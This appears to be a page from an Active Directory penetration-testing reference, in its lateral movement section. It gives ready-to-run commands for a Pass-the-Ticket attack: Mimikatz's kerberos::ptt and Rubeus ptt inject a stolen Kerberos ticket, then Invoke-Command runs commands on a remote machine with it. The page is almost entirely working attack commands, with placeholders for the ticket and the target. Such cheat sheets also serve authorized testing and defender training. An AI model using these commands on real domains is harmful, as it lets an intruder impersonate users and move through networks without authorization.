> For the complete documentation index, see [llms.txt](https://activedirectory.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://activedirectory.mrw0l05zyn.cl/movimiento-lateral/pass-the-ticket-ptt.md).

# Pass the Ticket (PtT)

## Invoke-Mimikatz

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt <ticket.kirbi>"'
Invoke-Command -ComputerName <computer-name> -ScriptBlock {hostname; whoami; ipconfig}
```

## Rubeus

```
.\Rubeus.exe ptt /ticket:<ticket-base64>
```
